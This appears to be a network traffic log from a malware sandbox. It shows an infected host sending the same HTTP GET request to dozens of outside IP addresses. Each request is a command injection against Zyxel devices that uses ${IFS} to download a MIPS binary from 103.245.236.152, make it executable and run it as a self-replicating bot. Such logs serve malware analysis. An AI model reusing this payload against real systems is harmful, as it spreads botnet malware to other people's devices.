                                          Jan 14, 2024 15:46:07.820231915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2510192.168.2.235715481.185.75.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820266008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2511192.168.2.23534609.145.154.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820297003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2512192.168.2.2337268216.119.115.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820313931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2513192.168.2.2358276143.253.143.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820334911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2514192.168.2.234327898.127.140.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820372105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2515192.168.2.2338368137.194.243.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820425987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2516192.168.2.2350206113.237.187.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820425987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2517192.168.2.235257681.228.208.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820470095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2518192.168.2.235580888.110.75.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820470095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2519192.168.2.2337620116.139.198.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820491076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2520192.168.2.2358830199.242.228.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820522070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2521192.168.2.2345220175.228.206.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820544958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2522192.168.2.2341298141.145.193.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820576906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2523192.168.2.235615435.3.101.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820586920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2524192.168.2.233479852.212.56.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820610046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2525192.168.2.2350864105.149.17.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820652008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2526192.168.2.234920019.73.183.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820652962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2527192.168.2.233417483.165.159.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820677996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2528192.168.2.2338994132.172.237.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820712090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2529192.168.2.2343356173.67.216.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820729971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2530192.168.2.233859665.184.232.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820760965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2531192.168.2.2350774143.30.245.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820795059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2532192.168.2.2343588206.130.131.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820796013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2533192.168.2.2345592148.105.201.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820848942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2534192.168.2.2333198167.139.227.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820852041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2535192.168.2.2348976159.205.198.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820868015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2536192.168.2.2359434118.16.25.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820905924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2537192.168.2.234955248.195.5.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820919991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2538192.168.2.235826438.181.160.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820969105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2539192.168.2.2337492182.62.134.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820981979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2540192.168.2.2337826121.212.108.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820987940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2541192.168.2.2351808129.187.213.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.820992947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2542192.168.2.2345368118.218.240.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.821041107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2543192.168.2.2353830201.146.18.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.821065903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2544192.168.2.2359864103.145.211.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.821067095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2545192.168.2.234939473.234.227.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.821094990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2546192.168.2.2335552108.156.49.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.821147919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2547192.168.2.2337616193.148.209.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.822998047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2548192.168.2.2349796133.14.124.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823014021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2549192.168.2.2339698185.190.157.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823657036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2550192.168.2.235242278.85.111.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823678017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2551192.168.2.2346792182.18.36.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823698044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2552192.168.2.233729234.51.102.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823730946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2553192.168.2.2347578203.70.103.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823756933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2554192.168.2.234493213.105.171.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823777914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2555192.168.2.235949459.195.6.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823832989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2556192.168.2.2359242191.213.70.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823867083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2557192.168.2.235703451.213.96.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823892117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2558192.168.2.233553444.71.216.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823908091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2559192.168.2.235685265.150.247.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823915958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2560192.168.2.2339906175.75.36.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823935032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2561192.168.2.2358062181.151.161.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823987961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2562192.168.2.23476922.124.218.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.823992968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2563192.168.2.233282441.223.25.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824038029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2564192.168.2.235120640.112.63.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824074984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2565192.168.2.2353556162.99.98.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824090958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2566192.168.2.2340794117.63.189.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824093103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2567192.168.2.234353462.249.102.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824099064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2568192.168.2.235674276.216.126.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824127913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2569192.168.2.235085841.27.17.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824162960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2570192.168.2.236084644.7.186.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824187994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2571192.168.2.234478036.59.31.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.824229002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2572192.168.2.2333810165.5.125.236443
                                          TimestampBytes transferredDirectionData
